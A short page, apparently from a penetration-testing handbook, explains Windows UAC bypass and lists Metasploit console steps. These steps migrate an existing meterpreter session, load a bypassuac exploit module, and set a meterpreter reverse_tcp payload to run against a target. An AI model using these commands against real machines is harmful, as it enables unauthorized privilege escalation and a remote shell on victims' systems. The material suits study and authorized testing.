handbook/tools/5.Machine/3.Active-Directory/General/Exploitation/5.Exploiting-AD/Specific-Topics/Bypassing-UAC.md
2024-08-31 01:07:22 +02:00

1.1 KiB
Raw Blame History

What is Bypassing UAC

Bypassing User access Control Adversaries may bypass UAC mechanisms to elevate process privileges on the system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. 

Commands

  • Take note that to follow those step, you must have a meterpreter session all ready open with the targeted machine
# Make sure you have migrate your process ID to a more stable process
# More information on migration 
ps                       ---> Show all the process id
migrate 1234             ---> Migrate the session

# Use Exploit
search bypassuac
use exploit/windows/local/bypassuac_injection_winsxs   ---> or any other bypassuac

# Set Payload
set payload windows/x64/meterpreter/reverse_tcp
show options
Set options              ---> Set the options
set target windows x64
set session X
run

More information ---> 2 - Meterpreter